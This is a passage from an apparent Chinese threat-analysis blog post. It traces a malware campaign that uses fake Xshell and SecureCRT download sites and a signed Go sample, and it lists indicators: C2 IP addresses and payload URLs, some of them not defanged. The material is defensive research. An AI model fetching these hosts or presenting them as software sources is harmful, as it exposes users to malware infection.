left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">update.sslcsdn[.]com</span></code><span leaf=""> 关联出一个没有见过的样本 update (35).exe。</span></p><p><img data-imgfileid="100001325" class="rich_pages wxw-img" data-ratio="0.33951025810721375" data-s="300,640" data-type="png" data-w="3022" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=ebcd3c22&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8icNRich78J5xPsTlVZBETwC1SLiaEV8OVTLDRqMvC2JiaiaiaIj6OVhxKMicQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个样本签名于 2024-11-09 07:48:00 UTC，第一次被上传于 2024-11-20 02:06:37 UTC，也是比较早期曝光的样本，另外很重要的是样本也带有  &#34;Chengdu Nuoxin Times Technology Co., Ltd.&#34; 这一个有效的签名。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">纵观整次事件带有效签名的样本并不算多，说明这个样本可能是攻击者比较重视的一个文件。</span></p><p><img data-imgfileid="100001326" class="rich_pages wxw-img" data-ratio="0.4541446208112875" data-s="300,640" data-type="png" data-w="2268" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=4bd56429&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8ia3f26FyvBS6RLibsItKNbggOlGuG1iaeuN5XQFlSu96Yg2zg9sObEHYw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">可以看到样本是 go 语言写的，有 20.65 MB  大。</span></p><p><img data-imgfileid="100001328" class="rich_pages wxw-img" data-ratio="0.5877976190476191" data-s="300,640" data-type="png" data-w="2688" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a5063e1b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8vQPOYLqLPEDvEEKHNxW5rNVSdwypiafibGAEMMLe0lqDAtkXCL1NPvCw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">VT的 behavior 板块可以看到很多沙箱在跑起来样本后采集到的信息，其中就有行为、内存指标一类的信息。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">挨个排除掉微软、证书服务一类的白信息，可以发现除去已知的 update.sslcsdn.com、107.148.61.185:8084 以外，出现了一个生面孔 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.7zei[.]com</span></code><span leaf="">。</span></p><p><img data-imgfileid="100001329" class="rich_pages wxw-img" data-ratio="0.4214992927864215" data-s="300,640" data-type="png" data-w="2828" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f3856e27&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8bKfqM1ZVqbrKtqPdzE82k0GWaHvoKT4yudqbe4ibKGuUM4jzibzYfLOA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">并且可以看到内存中匹配到的 URL 字符串还有 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://update.sslcsdn[.]com/run" target="_blank">https://update.sslcsdn[.]com/run</a></span></code><span leaf=""> 、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://www.7zei[.]com/wasdsfas" target="_blank">https://www.7zei[.]com/wasdsfas</a></span></code></p><p><img data-imgfileid="100001330" class="rich_pages wxw-img" data-ratio="0.4228571428571429" data-s="300,640" data-type="png" data-w="2800" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=4f05d5a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh82Z01IP95TSyicN9VNLSKdnFXS1sNShHtJcWmvjrjgVkb9sicBc4rx4Ug%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">前者已经关站了下不到了，后者还开着，文件下载下来发现是无意义的文件，看上去可能是在内存加载的shellcode一类的东西。</span></p><p><img data-imgfileid="100001331" class="rich_pages wxw-img" data-ratio="0.42276422764227645" data-s="300,640" data-type="png" data-w="1722" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f1c52d35&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8f1SL0DyibMglf4dK3X3YAaFjHP6NCEOBaaL41rOD80Uzgp3QFydyUNw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001332" class="rich_pages wxw-img" data-ratio="0.2933212996389892" data-s="300,640" data-type="png" data-w="2216" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a7c6dc45&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8LEgxDsDBav2hiaoUX5gE5LRRkH6oXsibPMJLbbh9icSvhRXDdHW8HjOCQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">当时分析的时候奇安信的 ti 还没有标记 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.7zei[.]com</span></code><span leaf=""> 这个域名，所以我带着疑惑打开首页，发现是一个假冒的 Xshell 官网？？？</span></p><p><img data-imgfileid="100001334" class="rich_pages wxw-img" data-ratio="0.6154371584699454" data-s="300,640" data-type="png" data-w="2928" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=3cb7147a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8q2w60W7R52QMxP26T5VFcibto9waPw2kKOAcId6Om5uqmsNukImicBfA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">网页不知道套用了什么网站的模板，看得出来文案修改的素养比较有限，&#34;多版本的比较&#34;、&#34;以上都不需要&#34;。</span></p><p><img data-imgfileid="100001335" class="rich_pages wxw-img" data-ratio="0.5896084337349398" data-s="300,640" data-type="png" data-w="2656" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f601553f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8xVfb8As08W89wr5z519eScRc16sicia4EpQw8vzribKTQA6yfUduvnCjg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而网站的下载功能还是可以正常使用的，点击下载按钮调用的是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://www.7zei[.]com/download.php" target="_blank">https://www.7zei[.]com/download.php</a></span></code><span leaf="">，实际返回的文件是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://www.7zei[.]com/Xshell7.rar" target="_blank">https://www.7zei[.]com/Xshell7.rar</a></span></code><span leaf="">。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是打开压缩包发现，压缩包里并不是 Xshell，而是一个2024年9月15日修改过的 MobaXterm 程序。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">反正意思就是你就说这是不是 SSH软件吧，你凑活用就行了。</span></p><p><img data-imgfileid="100001333" class="rich_pages wxw-img" data-ratio="0.2538265306122449" data-s="300,640" data-type="png" data-w="1568" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=cb056379&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8J0tJicZH1ZjSDsTphWhUzNkicKFdkk9oIjmIjoaLzAYduAibZpCr2r3MA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个  MobaXterm 不仅证书已经损坏，还加了 enigma 的壳，不太正经的样子。</span></p><p><img data-imgfileid="100001336" class="rich_pages wxw-img" data-ratio="0.519277108433735" data-s="300,640" data-type="png" data-w="1660" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f85d7f51&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8W9zWQiaLbWH44kJUnNd36gsOEAsaqtfsicQSkG4jZsHtfc9SGX4icGKXg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这草率的一切吸引着我继续探索，由于这个可疑的 MobaXterm exe 时间已经比较早了，所以我直接在 VT 搜索了他的 hash，发现确实已经被人上传过了。</span></p><p><img data-imgfileid="100001338" class="rich_pages wxw-img" data-ratio="0.6056884292178409" data-s="300,640" data-type="png" data-w="3094" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=226cfb53&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8P4wHyLxz3Go8icq2S3rfdHpv4mo05qUQ4rnlIU1XicAo2ib2EMsnCDiccg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">样本关联出了新的 URL 和域名：</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLVqWiaaeT9kOQEt2bfEia4W7EoRzXmp7eqgMuAhxs2rWvP3tTPOtKEWS2EDsutXDwiabibvp9ugMDUyr/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf=""><a href="http://154.19.200[.]133:8087/count" target="_blank">http://154.19.200[.]133:8087/count</a></span><span leaf=""><br/></span><span leaf=""><a href="https://scrt1.nyazz.com/MobServe.exe" target="_blank">https://scrt1.nyazz.com/MobServe.exe</a></span><span leaf=""><br/></span><span leaf=""><a href="https://ssh.0523qyfw.com/MobServe.dll" target="_blank">https://ssh.0523qyfw.com/MobServe.dll</a></span><span leaf=""><br/></span></code></pre><p><img data-imgfileid="100001337" class="rich_pages wxw-img" data-ratio="0.16843971631205673" data-s="300,640" data-type="png" data-w="3384" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5fcd1e4d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8nQic8ny0rJxqk5gmuRCqLFY1X4uuYFzdF2uNADLJJJG7vicONo1gPVEQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">以及一个没有出现过的 C2 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">107.148.62.100:8084</span></code></p><p><img data-imgfileid="100001339" class="rich_pages wxw-img" data-ratio="0.6393557422969187" data-s="300,640" data-type="png" data-w="2856" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=b9f4e3d7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8ocUGVMcwz88Or94ZjlMNp80YXoLSpcbQpc3NEicpfDmicBEwujav5TgQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">其中 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">ssh.0523qyfw[.]com </span></code><span leaf=""> 已经无法打开，但是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://scrt1.nyazz[.]com/" target="_blank">https://scrt1.nyazz[.]com/</a></span></code><span leaf="">  还是可以打开的，是一个假冒的 SecureCRT 官网...</span></p><p><img data-imgfileid="100001342" class="rich_pages wxw-img" data-ratio="0.5974276527331189" data-s="300,640" data-type="png" data-w="3110" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=746c815c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8xg6tnQG6jx8HOnvYaC1RCuciaVUpSOaKuNRTfXMQkdM7DBrehic1HfQw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">也是类似的网页模板。</span></p><p><img data-imgfileid="100001340" class="rich_pages wxw-img" data-ratio="0.5816091954022988" data-s="300,640" data-type="png" data-w="2610" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=eaaee3c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8FzPGibn8jZhYgOpCDxCUL4YOOUFgVGQyMicuyjufxWPSRTOkfmibiaK4gQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">访问 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://scrt1.nyazz[.]com/download.php" target="_blank">https://scrt1.nyazz[.]com/download.php</a></span></code><span leaf=""> 直接返回 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: 